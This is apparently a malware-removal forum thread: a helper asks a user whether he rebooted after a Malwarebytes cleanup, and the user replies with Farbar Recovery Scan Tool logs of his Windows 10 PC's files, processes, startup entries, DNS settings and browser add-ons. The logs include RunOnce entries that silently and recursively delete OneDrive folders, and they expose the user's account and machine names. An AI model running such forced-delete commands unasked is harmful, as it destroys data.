2016-03-09 19:31 - 2015-12-19 19:44 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 19:30 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-09 19:30 - 2015-10-30 00:28 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 19:28 - 2015-10-30 01:21 - 00000000 ____D C:\WINDOWS\INF
2016-03-09 19:25 - 2015-12-19 19:15 - 04967824 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 19:21 - 2015-10-30 01:24 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 18:52 - 2015-03-31 19:40 - 00000000 ____D C:\Program Files (x86)\Fitbit Connect
2016-03-09 18:31 - 2014-07-07 11:34 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-09 18:20 - 2013-09-16 08:59 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 18:16 - 2013-09-16 08:59 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-09 18:15 - 2015-10-30 01:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 17:47 - 2014-07-07 11:35 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-09 17:34 - 2014-07-08 15:30 - 00000000 ____D C:\Users\levilaing\AppData\Local\Adobe
2016-03-09 16:46 - 2015-12-19 19:25 - 00000000 ____D C:\Users\levilaing
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files\Google
2016-03-09 16:46 - 2014-07-07 11:34 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-09 16:45 - 2015-09-03 10:03 - 00000000 ____D C:\Users\levilaing\AppData\LocalLow\Temp
2016-03-09 16:36 - 2015-10-30 00:28 - 00008192 ___SH C:\WINDOWS\system32\config\ELAM
2016-03-09 16:26 - 2015-09-01 10:51 - 00002416 _____ C:\Users\levilaing\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-03-09 16:26 - 2013-12-13 17:53 - 00000000 __RDO C:\Users\levilaing\SkyDrive
2016-03-09 10:07 - 2015-10-30 01:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 16:57 - 2013-09-13 13:01 - 00000000 ____D C:\Users\levilaing\AppData\Local\Packages
2016-03-08 16:54 - 2014-07-07 11:34 - 00000000 ____D C:\Users\levilaing\AppData\Local\Google
2016-03-08 16:54 - 2014-01-16 14:20 - 00000000 ____D C:\ProgramData\Google
2016-03-08 16:53 - 2012-12-20 18:47 - 00000000 ____D C:\Program Files (x86)\CyberLink
2016-03-08 16:53 - 2012-12-20 18:32 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 16:52 - 2012-12-20 18:46 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-03-08 16:51 - 2015-09-28 19:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2016-03-08 16:50 - 2015-09-28 19:17 - 00000000 ____D C:\Program Files\Canon
2016-03-08 16:50 - 2014-01-21 17:04 - 00000000 ____D C:\Program Files (x86)\Canon
2016-03-07 17:19 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\rescache
2016-03-01 13:45 - 2015-12-19 19:24 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-03-01 13:40 - 2012-12-20 19:23 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-01 13:33 - 2015-10-30 03:07 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 __RSD C:\WINDOWS\Media
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-03-01 13:33 - 2015-10-30 01:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-03-01 13:33 - 2015-10-30 00:28 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-03-01 13:27 - 2015-12-24 12:27 - 00000000 ____D C:\ProgramData\Norton
2016-03-01 08:26 - 2015-12-07 08:59 - 00002005 _____ C:\Users\levilaing\Desktop\Dashlane.lnk
2016-03-01 08:26 - 2015-12-07 08:58 - 00000000 ____D C:\Users\levilaing\AppData\Roaming\Dashlane
2016-02-29 13:22 - 2013-09-13 13:11 - 00000000 ____D C:\Users\levilaing\AppData\Local\ElevatedDiagnostics
2016-02-23 16:21 - 2015-12-15 14:22 - 00000000 ____D C:\Users\levilaing\Desktop\Tor Browser
2016-02-17 19:42 - 2014-10-21 09:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\ProgramData\Oracle
2016-02-17 19:42 - 2013-11-15 12:08 - 00000000 ____D C:\Program Files (x86)\Java
2016-02-17 19:41 - 2016-01-05 13:15 - 00000000 ____D C:\Users\levilaing\.oracle_jre_usage
2016-02-17 19:41 - 2014-10-21 09:58 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-02-17 19:18 - 2016-01-05 13:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-02-16 13:23 - 2016-01-05 13:36 - 00000000 ____D C:\Users\levilaing\AppData\Local\CrashDumps
2016-02-12 18:00 - 2013-12-24 11:04 - 00000000 ____D C:\Program Files (x86)\HP SimplePass
2016-02-09 14:04 - 2013-08-22 07:25 - 00000167 _____ C:\WINDOWS\win.ini
2016-02-09 09:02 - 2013-09-16 14:19 - 00000000 ____D C:\Users\levilaing\Documents\Youcam

==================== Files in the root of some directories =======

2015-12-18 17:54 - 2015-12-18 17:54 - 0001035 _____ () C:\Program Files (x86)\suit.log
2014-04-18 15:32 - 2014-04-18 15:32 - 0007168 _____ () C:\Users\levilaing\AppData\Roaming\SQLiteManager3.pref
2014-02-04 20:57 - 2014-02-04 20:57 - 0000045 _____ () C:\Users\levilaing\AppData\Roaming\WB.CFG
2014-05-23 10:53 - 2014-05-23 10:53 - 0002165 _____ () C:\Users\levilaing\AppData\Local\recently-used.xbel

Some files in TEMP:
====================
C:\Users\levilaing\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-02 03:16

==================== End of FRST.txt ============================



#12
pystryker

    Trusted Helper

  • Malware Removal
  • 3,886 posts
Hello :)

You did reboot after running Malwarebytes, correct? I ask because the log says the file I wanted to get rid of has "Delete on Reboot" beside it. That usually means the machine has not been rebooted. It's not showing up in the fresh FRST log, but I want to be sure as this infection can return if that file isn't removed. Please let me know, and we'll continue. :thumbsup:

#13
LLL31

    Member

  • Topic Starter
  • Member
  • 15 posts

I just did it again just to be sure.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (09-03-2016 20:35:45)
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\System32\valWBFPolicyService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10586.113_none_7689896a26389b16\TiWorker.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbam.exe
(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.6568.46271.0_x64__8wekyb3d8bbwe\HxTsr.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2016-03-09]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension  - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
